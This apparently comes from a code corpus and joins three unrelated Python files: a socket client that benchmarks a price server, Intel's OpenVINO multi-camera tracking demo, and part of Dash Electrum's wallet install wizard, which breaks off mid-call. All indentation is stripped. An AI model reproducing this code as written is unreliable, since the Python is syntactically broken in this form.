javaPackage = JPackage("java.lang")
javaTimer = javaPackage.System.nanoTime
# function to create one client with id = id
def create_client(id):
# Connecting to the socket
sr = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sr.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
sr.connect(('127.0.0.1', middle_port_client))
# wait for confirmation
f = open(f"data/o{id}", 'w')
while sr.recv(1024).decode().lower() != "started":
pass
print("connected", id)
totalT = 0
notional = 0
for _ in range(500): # CHANGE NUMBER OF REQUESTS HERE
# f.write(str(javaTimer()) + '\n')
t1 = javaTimer()
print(_)
# notional=randint(1,1000)
notional += 100
# send the request to the server
sr.send(f"Notional:{notional}".encode())
# wait for the reply from the server. The reply contains the best price for each supplier
s =sr.recv(8192).decode()
log = f"{_}, {javaTimer()}, {notional}, {javaTimer() - t1}, {s}\n"
f.write(log)
totalT += javaTimer() - t1
# print (_,notional, sr.recv(1024).decode())
f.close()
print(totalT)
# after sending the fixes, send "end" and close the client
sr.send("end".encode())
sr.close()
# create different threads for each client
t = [None]*num_clients
for _ in range(num_clients):
t[_] = Thread(target=create_client, args=(_,))
t[_].start()
# wait for all clients to end
for _ in range(num_clients):
t[_].join()
|
multi_camera_multi_target_tracking.py
|
#!/usr/bin/env python3
"""
Copyright (c) 2019-2020 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import argparse
import time
import queue
from threading import Thread
import json
import logging as log
import os
import random
import sys
import cv2 as cv
from utils.network_wrappers import Detector, VectorCNN, MaskRCNN, DetectionsFromFileReader
from mc_tracker.mct import MultiCameraTracker
from utils.analyzer import save_embeddings
from utils.misc import read_py_config, check_pressed_keys, AverageEstimator, set_log_config
from utils.video import MulticamCapture, NormalizerCLAHE
from utils.visualization import visualize_multicam_detections, get_target_size
from openvino.inference_engine import IECore # pylint: disable=import-error,E0611
sys.path.append(os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), 'common'))
import monitors
set_log_config()
def check_detectors(args):
detectors = {
'--m_detector': args.m_detector,
'--m_segmentation': args.m_segmentation,
'--detections': args.detections
}
non_empty_detectors = [(det, value) for det, value in detectors.items() if value]
det_number = len(non_empty_detectors)
if det_number == 0:
log.error('No detector specified, please specify one of the following parameters: '
'\'--m_detector\', \'--m_segmentation\' or \'--detections\'')
elif det_number > 1:
det_string = ''.join('\n\t{}={}'.format(det[0], det[1]) for det in non_empty_detectors)
log.error('Only one detector expected but got {}, please specify one of them:{}'
.format(len(non_empty_detectors), det_string))
return det_number
def update_detections(output, detections, frame_number):
for i, detection in enumerate(detections):
entry = {'frame_id': frame_number, 'scores': [], 'boxes': []}
for det in detection:
entry['boxes'].append(det[0])
entry['scores'].append(float(det[1]))
output[i].append(entry)
def save_json_file(save_path, data, description=''):
save_dir = os.path.dirname(save_path)
if save_dir and not os.path.exists(save_dir):
os.makedirs(save_dir)
with open(save_path, 'w') as outfile:
json.dump(data, outfile)
if description:
log.info('{} saved to {}'.format(description, save_path))
class FramesThreadBody:
def __init__(self, capture, max_queue_length=2):
self.process = True
self.frames_queue = queue.Queue()
self.capture = capture
self.max_queue_length = max_queue_length
def __call__(self):
while self.process:
if self.frames_queue.qsize() > self.max_queue_length:
time.sleep(0.1)
has_frames, frames = self.capture.get_frames()
if not has_frames and self.frames_queue.empty():
self.process = False
break
if has_frames:
self.frames_queue.put(frames)
def run(params, config, capture, detector, reid):
win_name = 'Multi camera tracking'
frame_number = 0
avg_latency = AverageEstimator()
output_detections = [[] for _ in range(capture.get_num_sources())]
key = -1
if config['normalizer_config']['enabled']:
capture.add_transform(
NormalizerCLAHE(
config['normalizer_config']['clip_limit'],
config['normalizer_config']['tile_size'],
)
)
tracker = MultiCameraTracker(capture.get_num_sources(), reid, config['sct_config'], **config['mct_config'],
visual_analyze=config['analyzer'])
thread_body = FramesThreadBody(capture, max_queue_length=len(capture.captures) * 2)
frames_thread = Thread(target=thread_body)
frames_thread.start()
if len(params.output_video):
frame_size, fps = capture.get_source_parameters()
target_width, target_height = get_target_size(frame_size, None, **config['visualization_config'])
video_output_size = (target_width, target_height)
fourcc = cv.VideoWriter_fourcc(*'XVID')
output_video = cv.VideoWriter(params.output_video, fourcc, min(fps), video_output_size)
else:
output_video = None
prev_frames = thread_body.frames_queue.get()
detector.run_async(prev_frames, frame_number)
presenter = monitors.Presenter(params.utilization_monitors, 0)
while thread_body.process:
if not params.no_show:
key = check_pressed_keys(key)
if key == 27:
break
presenter.handleKey(key)
start = time.perf_counter()
try:
frames = thread_body.frames_queue.get_nowait()
except queue.Empty:
frames = None
if frames is None:
continue
all_detections = detector.wait_and_grab()
if params.save_detections:
update_detections(output_detections, all_detections, frame_number)
frame_number += 1
detector.run_async(frames, frame_number)
all_masks = [[] for _ in range(len(all_detections))]
for i, detections in enumerate(all_detections):
all_detections[i] = [det[0] for det in detections]
all_masks[i] = [det[2] for det in detections if len(det) == 3]
tracker.process(prev_frames, all_detections, all_masks)
tracked_objects = tracker.get_tracked_objects()
latency = max(time.perf_counter() - start, sys.float_info.epsilon)
avg_latency.update(latency)
fps = round(1. / latency, 1)
vis = visualize_multicam_detections(prev_frames, tracked_objects, fps, **config['visualization_config'])
presenter.drawGraphs(vis)
if not params.no_show:
cv.imshow(win_name, vis)
if output_video:
output_video.write(cv.resize(vis, video_output_size))
print('\rProcessing frame: {}, fps = {} (avg_fps = {:.3})'.format(
frame_number, fps, 1. / avg_latency.get()), end="")
prev_frames, frames = frames, prev_frames
print(presenter.reportMeans())
print('')
thread_body.process = False
frames_thread.join()
if len(params.history_file):
save_json_file(params.history_file, tracker.get_all_tracks_history(), description='History file')
if len(params.save_detections):
save_json_file(params.save_detections, output_detections, description='Detections')
if len(config['embeddings']['save_path']):
save_embeddings(tracker.scts, **config['embeddings'])
def main():
current_dir = os.path.dirname(os.path.abspath(__file__))
"""Prepares data for the object tracking demo"""
parser = argparse.ArgumentParser(description='Multi camera multi object \
tracking live demo script')
parser.add_argument('-i', type=str, nargs='+', help='Input sources (indexes \
of cameras or paths to video files)', required=True)
parser.add_argument('--config', type=str, default=os.path.join(current_dir, 'configs/person.py'), required=False,
help='Configuration file')
parser.add_argument('--detections', type=str, help='JSON file with bounding boxes')
parser.add_argument('-m', '--m_detector', type=str, required=False,
help='Path to the object detection model')
parser.add_argument('--t_detector', type=float, default=0.6,
help='Threshold for the object detection model')
parser.add_argument('--m_segmentation', type=str, required=False,
help='Path to the object instance segmentation model')
parser.add_argument('--t_segmentation', type=float, default=0.6,
help='Threshold for object instance segmentation model')
parser.add_argument('--m_reid', type=str, required=True,
help='Path to the object re-identification model')
parser.add_argument('--output_video', type=str, default='', required=False,
help='Optional. Path to output video')
parser.add_argument('--history_file', type=str, default='', required=False,
help='Optional. Path to file in JSON format to save results of the demo')
parser.add_argument('--save_detections', type=str, default='', required=False,
help='Optional. Path to file in JSON format to save bounding boxes')
parser.add_argument("--no_show", help="Optional. Don't show output", action='store_true')
parser.add_argument('-d', '--device', type=str, default='CPU')
parser.add_argument('-l', '--cpu_extension',
help='MKLDNN (CPU)-targeted custom layers.Absolute \
path to a shared library with the kernels impl.',
type=str, default=None)
parser.add_argument('-u', '--utilization_monitors', default='', type=str,
help='Optional. List of monitors to show initially.')
args = parser.parse_args()
if check_detectors(args) != 1:
sys.exit(1)
if len(args.config):
log.info('Reading configuration file {}'.format(args.config))
config = read_py_config(args.config)
else:
log.error('No configuration file specified. Please specify parameter \'--config\'')
sys.exit(1)
random.seed(config['random_seed'])
capture = MulticamCapture(args.i)
log.info("Creating Inference Engine")
ie = IECore()
if args.detections:
object_detector = DetectionsFromFileReader(args.detections, args.t_detector)
elif args.m_segmentation:
object_detector = MaskRCNN(ie, args.m_segmentation,
config['obj_segm']['trg_classes'],
args.t_segmentation,
args.device, args.cpu_extension,
capture.get_num_sources())
else:
object_detector = Detector(ie, args.m_detector,
config['obj_det']['trg_classes'],
args.t_detector,
args.device, args.cpu_extension,
capture.get_num_sources())
if args.m_reid:
object_recognizer = VectorCNN(ie, args.m_reid, args.device, args.cpu_extension)
else:
object_recognizer = None
run(args, config, capture, object_detector, object_recognizer)
log.info('Demo finished successfully')
if __name__ == '__main__':
main()
|
installwizard.py
|
# Copyright (C) 2018 The Electrum developers
# Distributed under the MIT software license, see the accompanying
# file LICENCE or http://www.opensource.org/licenses/mit-license.php
import os
import json
import sys
import threading
import traceback
from typing import Tuple, List, Callable, NamedTuple, Optional, TYPE_CHECKING
from functools import partial
from PyQt5.QtCore import QRect, QEventLoop, Qt, pyqtSignal
from PyQt5.QtGui import QPalette, QPen, QPainter, QPixmap
from PyQt5.QtWidgets import (QWidget, QDialog, QLabel, QHBoxLayout, QMessageBox,
QVBoxLayout, QLineEdit, QFileDialog, QPushButton,
QGridLayout, QSlider, QScrollArea, QApplication,
QComboBox)
from electrum_dash.wallet import Wallet, Abstract_Wallet
from electrum_dash.storage import WalletStorage, StorageReadWriteError
from electrum_dash.util import UserCancelled, InvalidPassword, WalletFileException, get_new_wallet_name
from electrum_dash.base_wizard import (BaseWizard, HWD_SETUP_DECRYPT_WALLET,
GoBack, ReRunDialog, SaveAndExit)
from electrum_dash.network import Network
from electrum_dash.i18n import _
from .seed_dialog import SeedLayout, KeysLayout
from .network_dialog import NetworkChoiceLayout
from .util import (MessageBoxMixin, Buttons, icon_path, ChoicesLayout, WWLabel,
InfoButton, char_width_in_lineedit, PasswordLineEdit)
from .password_dialog import PasswordLayout, PasswordLayoutForHW, PW_NEW
from .bip39_recovery_dialog import Bip39RecoveryDialog
from electrum_dash.plugin import run_hook, Plugins
if TYPE_CHECKING:
from electrum_dash.simple_config import SimpleConfig
from electrum_dash.wallet_db import WalletDB
from . import ElectrumGui
MSG_ENTER_PASSWORD = _("Choose a password to encrypt your wallet keys.") + '\n'\
+ _("Leave this field empty if you want to disable encryption.")
MSG_HW_STORAGE_ENCRYPTION = _("Set wallet file encryption.") + '\n'\
+ _("Your wallet file does not contain secrets, mostly just metadata. ") \
+ _("It also contains your master public key that allows watching your addresses.") + '\n\n'\
+ _("Note: If you enable this setting, you will need your hardware device to open your wallet.")
WIF_HELP_TEXT = (_('WIF keys are typed in Dash Electrum, based on script type.') + '\n\n' +
_('A few examples') + ':\n' +
'p2pkh:XERBBcaPf5D5... \t-> XhGqfhnL...\n')
# note: full key is XERBBcaPf5D5oFXTEP7TdPWLem5ktc2Zr3AhhQhHVQaF49fDP6tN
MSG_PASSPHRASE_WARN_ISSUE4566 = _("Warning") + ": "\
+ _("You have multiple consecutive whitespaces or leading/trailing "
"whitespaces in your passphrase.") + " " \
+ _("This is discouraged.") + " " \
+ _("Due to a bug, old versions of Dash Electrum will NOT be creating the "
"same wallet as newer versions or other software.")
class CosignWidget(QWidget):
size = 120
def __init__(self, m, n):
QWidget.__init__(self)
self.R = QRect(4, 4, self.size-8, self.size-8)
self.setGeometry(self.R)
self.setMinimumHeight(self.size)
self.setMaximumHeight(self.size)
self.m = m
self.n = n
def set_n(self, n):
self.n = n
self.update()
def set_m(self, m):
self.m = m
self.update()
def paintEvent(self, event):
bgcolor = self.palette().color(QPalette.Background)
pen = QPen(bgcolor, 8, Qt.SolidLine)
qp = QPainter()
qp.begin(self)
qp.setPen(pen)
qp.setRenderHint(QPainter.Antialiasing)
qp.setBrush(Qt.gray)
for i in range(self.n):
alpha = int(16* 360 * i/self.n)
alpha2 = int(16* 360 * 1/self.n)
qp.setBrush(Qt.green if i<self.m else Qt.gray)
qp.drawPie(self.R, alpha, alpha2)
qp.end()
def wizard_dialog(func):
def func_wrapper(*args, **kwargs):
run_next = kwargs['run_next']
wizard = args[0] # type: InstallWizard
while True:
#wizard.logger.debug(f"dialog stack. len: {len(wizard._stack)}. stack: {wizard._stack}")
wizard.back_button.setText(_('Back') if wizard.can_go_back() else _('Cancel'))
wizard.save_button.hide()
# current dialog
try:
out = func(*args, **kwargs)
if type(out) is not tuple:
out = (out,)
except GoBack:
if not wizard.can_go_back():
wizard.close()
raise UserCancelled
else:
# to go back from the current dialog, we just let the caller unroll the stack:
raise
except SaveAndExit:
out = tuple()
run_next = wizard.create_wallet
# next dialog
try:
while True:
try:
run_next(*out)
except ReRunDialog:
# restore state, and then let the loop re-run next
wizard.go_back(rerun_previous=False)
else:
break
except GoBack as e:
# to go back from the next dialog, we ask the wizard to restore state
wizard.go_back(rerun_previous=False)
# and we re-run the current dialog
if wizard.can_go_back():
# also rerun any calculations that might have populated the inputs to the current dialog,
# by going back to just after the *previous* dialog finished
raise ReRunDialog() from e
else:
continue
else:
break
return func_wrapper
class WalletAlreadyOpenInMemory(Exception):
def __init__(self, wallet: Abstract_Wallet):
super().__init__()
self.wallet = wallet
# WindowModalDialog must come first as it overrides show_error
class InstallWizard(QDialog, MessageBoxMixin, BaseWizard):
accept_signal = pyqtSignal()
def __init__(self, config: 'SimpleConfig', app: QApplication, plugins: 'Plugins', *, gui_object: 'ElectrumGui'):
QDialog.__init__(self, None)
BaseWizard.__init__(self, config, plugins)
self.setWindowTitle('Dash Electrum - ' + _('Install Wizard'))
self.app = app
self.config = config
self.gui_thread = gui_object.gui_thread
self.setMinimumSize(600, 400)
self.accept_signal.connect(self.accept)
self.title = QLabel()
self.main_widget = QWidget()
self.save_button = QPushButton(_('Save and exit'), self)
self.save_button.hide()
self.back_button = QPushButton(_("Back"), self)
self.back_button.setText(_('Back') if self.can_go_back() else _('Cancel'))
self.next_button = QPushButton(_("Next"), self)
self.next_button.setDefault(True)
self.logo = QLabel()
self.please_wait = QLabel(_("Please wait..."))
self.please_wait.setAlignment(Qt.AlignCenter)
self.icon_filename = None
self.loop = QEventLoop()
self.rejected.connect(lambda: self.loop.exit(0))
self.back_button.clicked.connect(lambda: self.loop.exit(1))
self.next_button.clicked.connect(lambda: self.loop.exit(2))
self.save_button.clicked.connect(lambda: self.loop.exit(3))
outer_vbox = QVBoxLayout(self)
inner_vbox = QVBoxLayout()
inner_vbox.addWidget(self.title)
inner_vbox.addWidget(self.main_widget)
inner_vbox.addStretch(1)
inner_vbox.addWidget(self.please_wait)
inner_vbox.addStretch(1)
scroll_widget = QWidget()
scroll_widget.setLayout(inner_vbox)
scroll = QScrollArea()
scroll.setWidget(scroll_widget)
scroll.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
scroll.setWidgetResizable(True)
icon_vbox = QVBoxLayout()
icon_vbox.addWidget(self.logo)
icon_vbox.addStretch(1)
hbox = QHBoxLayout()
hbox.addLayout(icon_vbox)
hbox.addSpacing(5)
hbox.addWidget(scroll)
hbox.setStretchFactor(scroll, 1)
outer_vbox.addLayout(hbox)
btns_hbox = QHBoxLayout()
btns_hbox.addWidget(self.save_button)
btns_hbox.addStretch(1)
btns_hbox.addLayout(Buttons(self.back_button, self.next_button))
outer_vbox.addLayout(btns_hbox)
self.set_icon('electrum-dash.png')
self.show()
self.raise_()
self.refresh_gui() # Need for QT on MacOSX. Lame.
def select_storage(self, path, get_wallet_from_daemon) -> Tuple[str, Optional[WalletStorage]]:
vbox = QVBoxLayout()
hbox = QHBoxLayout()
hbox.addWidget(QLabel(_('Wallet') + ':'))
name_e = QLineEdit()
hbox.addWidget(name_e)
button = QPushButton(_('Choose...'))
hbox.addWidget(button)
vbox.addLayout(hbox)
msg_label = WWLabel('')
vbox.addWidget(msg_label)
hbox2 = QHBoxLayout()
pw_e = PasswordLineEdit('', self)
pw_e.setFixedWidth(17 * char_width_in_lineedit())
pw_label = QLabel(_('Password') + ':')
hbox2.addWidget(pw_label)
hbox2.addWidget(pw_e)
hbox2.addStretch()
vbox.addLayout(hbox2)
vbox.addSpacing(50)
vbox_create_new = QVBoxLayout()
vbox_create_new.addWidget(QLabel(_('Alternatively') + ':'), alignment=Qt.AlignLeft)
button_create_new = QPushButton(_('Create New Wallet'))
button_create_new.setMinimumWidth(120)
vbox_create_new.addWidget(button_create_new, alignment=Qt.AlignLeft)
widget_create_new = QWidget()
widget_create_new.setLayout(vbox_create_new)
vbox_create_new.setContentsMargins(0, 0, 0, 0)
vbox.addWidget(widget_create_new)
self.set_layout(vbox, title=_('Dash Electrum wallet'))
temp_storage = None # type: Optional[WalletStorage]
wallet_folder = os.path.dirname(path)
def on_choose():
path, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if path:
name_e.setText(path)
def on_filename(filename):
# FIXME? "filename" might contain ".." (etc) and hence sketchy path traversals are possible
nonlocal temp_storage
temp_storage = None
msg = None
path = os.path.join(wallet_folder, filename)
wallet_from_memory = get_wallet_from_daemon(path)
try:
if wallet_from_memory:
temp_storage = wallet_from_memory.storage # type: Optional[WalletStorage]
else:
temp_storage = WalletStorage(path)
except (StorageReadWriteError, WalletFileException) as e:
msg = _('Cannot read file') + f'\n{repr(e)}'
except Exception as e:
self.logger.exception('')
msg = _('Cannot read file') + f'\n{repr(e)}'
self.next_button.setEnabled(temp_storage is not None)
user_needs_to_enter_password = False
if temp_storage:
if not temp_storage.file_exists():
msg =_("This file does not exist.") + '\n' \
+ _("Press 'Next' to create this wallet, or choose another file.")
elif not wallet_from_memory:
if temp_storage.is_encrypted_with_user_pw():
msg = _("This file is encrypted with a password.") + '\n' \
+ _('Enter your password or choose another file.')
user_needs_to_enter_password = True
elif temp_storage.is_encrypted_with_hw_device():
msg = _("This file is encrypted using a hardware device.") + '\n' \
+ _("Press 'Next' to choose device to decrypt.")
else:
msg = _("Press 'Next' to open this wallet.")
else:
msg = _("This file is already open in memory.") + "\n" \
+ _("Press 'Next' to create/focus window.")
if msg is None:
msg = _('Cannot read file')
msg_label.setText(msg)
widget_create_new.setVisible(bool(temp_storage and temp_storage.file_exists()))
if user_needs_to_enter_password:
pw_label.show()
pw_e.show()
pw_e.setFocus()
else:
pw_label.hide()
pw_e.hide()
button.clicked.connect(on_choose)
button_create_new.clicked.connect(
partial(
name_e.setText,
get_new_wallet_name(wallet_folder)))
name_e.textChanged.connect(on_filename)
name_e.setText(os.path.basename(path))
def run_user_interaction_loop():
while True:
if self.loop.exec_() != 2: # 2 = next
raise UserCancelled()
assert temp_storage
if temp_storage.file_exists() and not temp_storage.is_encrypted():
break
if not temp_storage.file_exists():
break
wallet_from_memory = get_wallet_from_daemon(temp_storage.path)
if wallet_from_memory:
raise WalletAlreadyOpenInMemory(wallet_from_memory)
if temp_storage.file_exists() and temp_storage.is_encrypted():
if temp_storage.is_encrypted_with_user_pw():
password = pw_e.text()
try:
temp_storage.decrypt(password)
break
except InvalidPassword as e:
self.show_message(title=_('Error'), msg=str(e))
continue
except BaseException as e:
self.logger.exception('')
self.show_message(title=_('Error'), msg=repr(e))
raise UserCancelled()
elif temp_storage.is_encrypted_with_hw_device():
try:
self.run('choose_hw_device', HWD_SETUP_DECRYPT_WALLET, storage=temp_storage)
except InvalidPassword as e:
self.show_message(title=_('Error'),
msg=_('Failed to decrypt using this hardware device.') + '\n' +
_('If you use a passphrase, make sure it is correct.'))
self.reset_stack()
return self.select_storage(path, get_wallet_from_daemon)
except (UserCancelled, GoBack):
raise
except BaseException as e:
self.logger.exception('')
self.show_message(title=_('Error'), msg=repr(e))
raise UserCancelled()
if temp_storage.is_past_initial_decryption():
break
else:
raise UserCancelled()
else:
raise Exception('Unexpected encryption version')
try:
run_user_interaction_loop()
finally:
try:
pw_e.clear()
except RuntimeError: # wrapped C/C++ object has been deleted.
pass # happens when decrypting with hw device
return temp_storage.path, (temp_storage if temp_storage.file_exists() else None)
def run_upgrades(self, storage: WalletStorage, db: 'WalletDB') -> None:
path = storage.path
if db.requires_split():
self.hide()
msg = _("The wallet '{}' contains multiple accounts, which are no longer supported since Dash Electrum 2.7.\n\n"
"Do you want to split your wallet into multiple files?").format(path)
if not self.question(msg):
return
file_list = db.split_accounts(path)
msg = _('Your accounts have been moved to') + ':\n' + '\n'.join(file_list) + '\n\n'+ _('Do you want to delete the old file') + ':\n' + path
if self.question(msg):
os.remove(path)
self.show_warning(_('The file was removed'))
# raise now, to avoid having the old storage opened
raise UserCancelled()
action = db.get_action()
if action and db.requires_upgrade():
raise WalletFileException('Incomplete wallet files cannot be upgraded.')
if action:
self.hide()
msg = _("The file '{}' contains an incompletely created wallet.\n"
"Do you want to complete its creation now?").format(path)
if not self.question(msg):
if self.question(_("Do you want to delete '{}'?").format(path)):
os.remove(path)
self.show_warning(_('The file was removed'))
return
self.show()
self.data = json.loads(storage.read())
self.run(action)
for k, v in self.data.items():
db.put(k, v)
db.write(storage)
return
if db.requires_upgrade():
self.upgrade_db(storage, db)
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
self.logger.error("on_error", exc_info=exc_info)
self.show_error(str(exc_info[1]))
def set_icon(self, filename):
prior_filename, self.icon_filename = self.icon_filename, filename
self.logo.setPixmap(QPixmap(icon_path(filename))
.scaledToWidth(60, mode=Qt.SmoothTransformation))
return prior_filename
def set_layout(self, layout, title=None, next_enabled=True):
self.title.setText("<b>%s</b>"%title if title else "")
self.title.setVisible(bool(title))
# Get rid of any prior layout by assigning it to a temporary widget
prior_layout = self.main_widget.layout()
if prior_layout:
QWidget().setLayout(prior_layout)
self.main_widget.setLayout(layout)
self.back_button.setEnabled(True)
self.next_button.setEnabled(next_enabled)
if next_enabled:
self.next_button.setFocus()
self.main_widget.setVisible(True)
self.please_wait.setVisible(False)
def exec_layout(self, layout, title=None, raise_on_cancel=True,
next_enabled=True):
self.set_layout(layout, title, next_enabled)
result = self.loop.exec_()
if not result and raise_on_cancel:
raise UserCancelled()
if result == 1:
raise GoBack from None
if result == 3:
raise SaveAndExit from None
self.title.setVisible(False)
self.back_button.setEnabled(False)
self.next_button.setEnabled(False)
self.main_widget.setVisible(False)
self.please_wait.setVisible(True)
self.refresh_gui()
return result
def refresh_gui(self):
# For some reason, to refresh the GUI this needs to be called twice
self.app.processEvents()
self.app.processEvents()
def remove_from_recently_open(self, filename):
self.config.remove_from_recently_open(filename)
def text_input(self, title, message, is_valid, allow_multi=False):
slayout = KeysLayout(parent=self, header_layout=message, is_valid=is_valid,
allow_multi=allow_multi)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_text()
def seed_input(self, title, message, is_seed, options):
slayout = SeedLayout(title=message, is_seed=is_seed, options=options, parent=self)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_seed(), slayout.is_bip39, slayout.is_ext
@wizard_dialog
def add_xpub_dialog(self, title, message, is_valid, run_next, allow_multi=False, show_wif_help=False):
header_layout = QHBoxLayout()
label = WWLabel(message)
label.setMinimumWidth(400)
header_layout.addWidget(label)
if show_wif_help:
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
return self.text_input(title, header_layout, is_valid, allow_multi)
@wizard_dialog
def add_cosigner_dialog(self, run_next, index, is_valid):
title = _("Add Cosigner") + " %d"%index
message = ' '.join([
_('Please enter the master public key (xpub) of your cosigner.'),
_('Enter their master private key (xprv) if you want to be able to sign for them.')
])
return self.text_input(title, message, is_valid)
@wizard_dialog
def restore_seed_dialog(self, run_next, test):
options = []
if self.opt_ext:
options.append('ext')
if self.opt_bip39:
options.append('bip39')
title = _('Enter Seed')
message = _('Please enter your seed phrase in order to restore your wallet.')
return self.seed_input(title, message, test, options)
@wizard_dialog
def confirm_seed_dialog(self, run_next, seed, test):
self.app.clipboard().clear()
title = _('Confirm Seed')
message = ' '.join([
_('Your seed is important!'),
_('If you lose your seed, your money will be permanently lost.'),
_('To make sure that you have properly saved your seed, please retype it here.')
])
seed, is_bip39, is_ext = self.seed_input(title, message, test, None)
return seed
@wizard_dialog
def show_seed_dialog(self, run_next, seed_text):
title = _("Your wallet generation seed is:")
slayout = SeedLayout(seed=seed_text, title=title, msg=True, options=['ext'])
self.exec_layout(slayout)
return slayout.is_ext
def pw_layout(self, msg, kind, force_disable_encrypt_cb):
playout = PasswordLayout(msg=msg, kind=kind, OK_button=self.next_button,
force_disable_encrypt_cb=force_disable_encrypt_cb)
playout.encrypt_cb.setChecked(True)
try:
self.exec_layout(playout.layout())
return playout.new_password(), playout.encrypt_cb.isChecked()
finally:
playout.clear_password_fields()
@wizard_dialog
def request_password(self, run_next, force_disable_encrypt_cb=False):
"""Request the user enter a new password and confirm it. Return
the password or None for no password."""
return self.pw_layout(MSG_ENTER_PASSWORD, PW_NEW, force_disable_encrypt_cb)
@wizard_dialog
def continue_multisig_setup_dialog(self, m, n, keystores, run_next):
msg = ' '.join([
_("This wallet is unfinished multisig wallet"
" with {} cosigners and {} required signatures.").format(n, m),
_("Press 'Next' to finish creation of the wallet.")
])
vbox = QVBoxLayout()
msg_label = WWLabel(msg)
vbox.addWidget(msg_label)
cosigners_combobox = QComboBox(self)
xpub_label = WWLabel('')
xpub_layout = SeedLayout('xpub', icon=False, for_seed_words=False)
def on_cosigner_changed(i):
xpub = keystores[i].xpub
xpub_layout.seed_e.setText(xpub)
if i == 0:
msg = ' '.join([
_("Here is your master public key."),
_("Please share it with your cosigners.")
])
else:
msg = _("Here is your cosigner {} public key.").format(i+1)
xpub_label.setText(msg)
cosigners_combobox.currentIndexChanged.connect(on_cosigner_changed)
mpk_ks = keystores[0]
mpk_item = _('Master Public Key')
if hasattr(mpk_ks, 'label'):
mpk_item += f': {mpk_ks.get_type_text()} {mpk_ks.label}'
cosigners_combobox.addItem(mpk_item)
for i in range(len(keystores)):
if i > 0:
ks = keystores[i]
cs_item = _('Cosigner {}').format(i+1)
if hasattr(ks, 'label'):
cs_item += f': {ks.get_type_text()} {ks.label}'
cosigners_combobox.addItem(cs_item)
vbox.addWidget(cosigners_combobox)
vbox.addWidget(xpub_label)
vbox.addLayout(xpub_layout.layout())
self.exec_layout(vbox, _('Continue multisig wallet setup'))
return tuple()
@wizard_dialog
def unfinished_confirm_password(self, run_next):
vbox = QVBoxLayout()
msg_label = WWLabel(_('Please enter wallet password before continue'))
vbox.addWidget(msg_label)
hbox = QHBoxLayout()
pw_e = PasswordLineEdit('', self)
pw_e.setFixedWidth(17 * char_width_in_lineedit())
pw_label = QLabel(_('Password') + ':')
hbox.addWidget(pw_label)
hbox.addWidget(pw_e)
hbox.addStretch()
vbox.addLayout(hbox)
self.set_layout(vbox, title=_('Confirm wallet password'))
try:
while True:
pw_e.setFocus()
if self.loop.exec_() != 2: # 2 = next
raise UserCancelled()
password = pw_e.text()
try:
self.unfinished_check_password(password)
break
except InvalidPassword as e:
self.show_message(title=_('Error'), msg=str(e))
continue
except BaseException as e:
self.logger.exception('')
self.show_message(title=_('Error'), msg=repr(e))
raise UserCancelled()
finally:
pw_e.clear()
return password
@wizard_dialog
def request_storage_encryption(self, run_next):
playout = PasswordLayoutForHW(MSG_HW_STORAGE_ENCRYPTION)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.encrypt_cb.isChecked()
@wizard_dialog
def confirm_dialog(self, title, message, run_next):
self.confirm(message, title)
def confirm(self, message, title):
label = WWLabel(message)
vbox = QVBoxLayout()
vbox.addWidget(label)
self.exec_layout(vbox, title)
@wizard_dialog
def action_dialog(self, action, run_next):
self.run(action)
def terminate(self, **kwargs):
self.accept_signal.emit()
def waiting_dialog(self, task, msg, on_finished=None):
label = WWLabel(msg)
vbox = QVBoxLayout()
vbox.addSpacing(100)
label.setMinimumWidth(300)
label.setAlignment(Qt.AlignCenter)
vbox.addWidget(label)
self.set_layout(vbox, next_enabled=False)
self.back_button.setEnabled(False)
t = threading.Thread(target=task)
t.start()
while True:
t.join(1.0/60)
if t.is_alive():
self.refresh_gui()
else:
break
if on_finished:
on_finished()
def run_task_without_blocking_gui(self, task, *, msg=None):
assert self.gui_thread == threading.current_thread(), 'must be called from GUI thread'
if msg is None:
msg = _("Please wait...")
exc = None # type: Optional[Exception]
res = None
def task_wrapper():
nonlocal exc
nonlocal res
try:
res = task()
except Exception as e:
exc = e
self.waiting_dialog(task_wrapper, msg=msg)
if exc is None:
return res
else:
raise exc
@wizard_dialog
def choice_dialog(self, title, message, choices, run_next, can_save=False):
if can_save:
self.save_button.show()
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
clayout = ChoicesLayout(message, c_titles)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, title)
action = c_values[clayout.selected_index()]
return action
def query_choice(self, msg, choices):
"""called by hardware wallets"""
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, '')
return clayout.selected_index()
@wizard_dialog
def derivation_and_script_type_gui_specific_dialog(
self,
*,
title: str,
message1: str,
choices: List[Tuple[str, str, str]],
hide_choices: bool = False,
message2: str,
test_text: Callable[[str], int],
run_next,
default_choice_idx: int = 0,
get_account_xpub=None,
) -> Tuple[str, str]:
vbox = QVBoxLayout()
if get_account_xpub:
button = QPushButton(_("Detect Existing Accounts"))
def on_account_select(account):
script_type = account["script_type"]
if script_type == "p2pkh":
script_type = "standard"
button_index = c_values.index(script_type)
button = clayout.group.buttons()[button_index]
button.setChecked(True)
line.setText(account["derivation_path"])
button.clicked.connect(lambda: Bip39RecoveryDialog(self, get_account_xpub, on_account_select))
vbox.addWidget(button, alignment=Qt.AlignLeft)
vbox.addWidget(QLabel(_("Or")))
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
c_default_text = [x[2] for x in choices]
def on_choice_click(clayout):
idx = clayout.selected_index()
line.setText(c_default_text[idx])
clayout = ChoicesLayout(message1, c_titles, on_choice_click,
